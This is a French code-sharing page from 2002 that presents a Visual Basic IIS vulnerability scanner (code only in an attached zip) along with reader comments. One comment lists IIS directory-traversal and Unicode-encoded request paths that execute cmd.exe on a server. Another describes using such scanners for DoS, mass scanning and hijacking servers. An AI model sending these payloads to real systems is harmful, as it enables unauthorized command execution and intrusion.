AccueilCodesTutorielsForumsEmploiLivresConnexion

  • Visual Basic, VB6, VB.NET, VB 2005, VB CodeS-SourceS
  • RSS CodeS-SourceS
  • CodyxBot, le Bot GTalk & MSN qu'il vous faut !
  • Générez des revenus avec vos codes, scripts et tutoriaux
  • Aide à la navigation du site
begin process at 2009 01 08 08:14:10
Vous ne trouvez pas de réponse à votre problème ? Alors posez la question dans le forum. Souvenez-vous qu'il n'y a jamais de question bête, mais rester dans l'ignorance parce que l'on n'ose pas poser une question, ça c'est une erreur !

SCANNEUR DE FAILLES IIS


Information sur la source

Catégorie :Sécurité Classé sous : iis, faille, scan Niveau : Initié Date de création : 22/07/2002 Date de mise à jour : 22/07/2002 19:22:51 Vu / téléchargé: 10 276 / 856
Auteur : Zepetitlutin Ecrire un message privé
Note :
3,33 / 10 - par 3 personnes
3,33 / 10

  • 1

  • 2

  • 3

  • 4

  • 5

  • 6

  • 7

  • 8

  • 9

  • 10
Commentaire sur cette source (5)
Ajouter un commentaire et/ou une note

Description

C'est un simple scanneur de failles IIS. Il suffit d'entrer l'url d'un site, et le programme teste si celui-ci est affecté par la faille IIS. Pour l'instant, il ne teste pas beaucoup de failles mais l'interêt principal de la source est l'utilisation du contrôle Inet qui permet d'ouvrir une URL et de recevoir le résultat de la requête (on obtient le contenu de la page HTML si celle-ci existe). Bon codage à tous  
 

Source

  • tout est dans le zip 
tout est dans le zip

Conclusion

j'essayerais de rajouter des failles toutes les semaines.

Source prise dans la magazine "Hackerz Voice" (juin)
+ rajout d'autres failles signalées et trouvées sur le net
 

Fichier Zip

Pour les "Membres Club", vous pouvez télécharger directement un fichier contenu dans le zip sans télécharger le zip en entier !

Télécharger le zip

Commentaires et avis

signaler à un administrateur
Commentaire de Mercury le 22/07/2002 09:48:36

Source réalisée par le journal Harckerz Voice du mois de juin.

signaler à un administrateur
Commentaire de Imax le 22/07/2002 11:27:15

Je confirme également, source identique dans dans Hacherz Voice n°10 (tutoriel sur un scanner de failles IIS). T'aurais pu citer la source ...

signaler à un administrateur
Commentaire de Zepetitlutin le 22/07/2002 14:46:51

Tout à fait vrai, je vais de suite réparer ceci... Néanmoins je ne comptais pas m'attribuer le mérite de cette source...

signaler à un administrateur
Commentaire de Skywalker13 le 22/07/2002 17:39:09

qques une ...

/scripts/root.exe?/c+dir
/MSADC/root.exe?/c+dir
/c/winnt/system32/cmd.exe?/c+dir
/d/winnt/system32/cmd.exe?/c+dir
/scripts/..%255c../winnt/system32/cmd.exe?/c+dir
/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir
/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir
/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir
/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir
/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir
/scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir
/scripts/..%%35c../winnt/system32/cmd.exe?/c+dir
/scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir
/scripts/..%252f../winnt/system32/cmd.exe?/c+dir

signaler à un administrateur
Commentaire de Cerbere le 01/12/2002 18:26:18

Il faut tout de même avouer que ce code est d'une lenteur insupportable. Je pense qu'il faudrait plutôt utiliser des sockets et réccupérer uniquement les éléments de l'head nécessaire pour faire tourner l'appli, de plus je pense qu'il n'ai pas necessaire de continuer de faire tourner l'appli une fois que l'on a trouvé une faille, c'est une perte de temps (a moins d'être collectionneur de failles IIS ...). Enfin, je pense qu'il faudrait aller plus loin dans l'appli et automatiser les procédures, comme la génération de rep et de creation de fichier afin d'uploader, tout ça sous forme de fichier texte que l'on pourrait personnaliser a sa guise. Bon si je vous dit ça c'est que j'en ai fais un petit programme en Delphi qui fonctionne très bien et c'est pratique pour faire des PubStros, D.o.S, mass scan ou encore des bufferoverflows. Je pense qu'en VB ce doit être faisable, donc je vais m'y mettre dès que j'aurais un peu, je vous tiendrais au courrant des évolutions.

Pour terminer, je voulais juste vous informer que le ministre de la sécurité des US est en train de redefinir les lois concernant tout le secteur informatique. A vrai dire jusque là tout va bien ... mise a part les peines qui sont complètements absurdes !

( Extrait : le CSEA (Cyber Security Enhancement Act), a été rajouté en dernière minute au Homeland Security bill. Il étend les pouvoirs de la police en lui permettant d'effectuer des écoutes téléphoniques ou sur le net sans mandat. L'autre point clé concerne les fournisseurs d'accès internet, qui pourront avec plus de latitude communiquer à la police des informations concernant leurs abonnés. Enfin, les hackers ayant agi délibérément pour nuire seront passibles de peine de prison à vie.)

Pour conclure une p'tite phrase de BuSh :
«Une souris peut être aussi dangereuse qu'une balle ou une bombe»

Tout ça pour dire que faudra a un moment donné réduire l'utilisation de nos p'tits scanner iis, sql, netbios, ipc, etc ... snif !

Ajouter un commentaire

Discussions en rapport avec ce code source dans le forum

Creer une dll pour IIS/ASP [ par rcolas ] Bonjour le forum ! quelqu'un saurait m'indiquer comment créer une dll avec VB6 SP3. Le but est que je pourrai utiliser dans une page ASP exemple :---- Creer une dll pour IIS/ASP [ par rcolas ] Bonjour le forum ! quelqu'un saurait m'indiquer comment créer une dll avec VB6 SP3. Le but est que je pourrai utiliser dans une page ASP exemple :---- Scan reseau [ par Membraxe ] Salut a tous ,Je voudrais savoir comment faire pour avoir la liste des ordinateurs existantsur un reseau local et leurs adresse IP.Merci de me repondr scan clavier [ par fabiin ] je voudrais savoir si il était possible de connaitre les touches du clavier pressé. mais cela n'import ou dans windows(PS: c très urgent)Merci pas ava IIS 4 URGENT !! [ par toine ] Salut à tous ! Je veux faire fonctionner un site qui marche avec PWS mais avec IIS ... Voici la config : --> Serveur NT 4 --> IIS 4 --> Sp 4 Gestion des autorisations sous IIS [ par mz ] Je cherche de la doc sur la gestion des droits d'accès à un site sous IIS/NT.De plus, la vérité sous IE n'est pas vérifiée sous Netscape.Avez vous de Source pour un petit scan [ par Sycho ] J'aimerais avoir des source pour fair un scansur " C:" , " Disquette A " , etc..et qui peux chercher plusieur mots en meme temps,mais qu'il sois ecrit NIXXXXX ! UNE FAILLE DS TON SITE !!!! [ par flint ] Salut nix (si t'es pas Nix casses toi), il y a une faille permettant de voter autant de fois que l'on veut sur une source. Je ne te la dis pas ici pou


Nos sponsors

Sondage...

CalendriCode

Janvier 2009
LMMJVSD
   1234
567891011
12131415161718
19202122232425
262728293031 

Consulter la suite du CalendriCode

Téléchargements

Logiciels à télécharger sur le même thème :


Développement réalisé par Nicolas SOREL (Nix) avec l'aide de : Cyril DURAND et Emmanuel BAÏSE, Merci à Vincent pour ses précieux conseils
CodeS-SourceS.com© Toute reproduction même partielle est interdite sauf accord écrit du Webmaster
CodeS-SourceS.com© est une marque déposée tous droits réservés
Temps d'éxécution de la page : 0,390 sec

Google Coop CodeS-SourceS Google Coop CodeS-SourceS


Certaines images présentes sur le site (notament certains avatars) sont issues des collections IconShock, donc si vous souhaitez utiliser ces icons vous devez les acheter, ne les copiez pas et ne utilisez pas dans vos sites et applications sans les avoir commandé.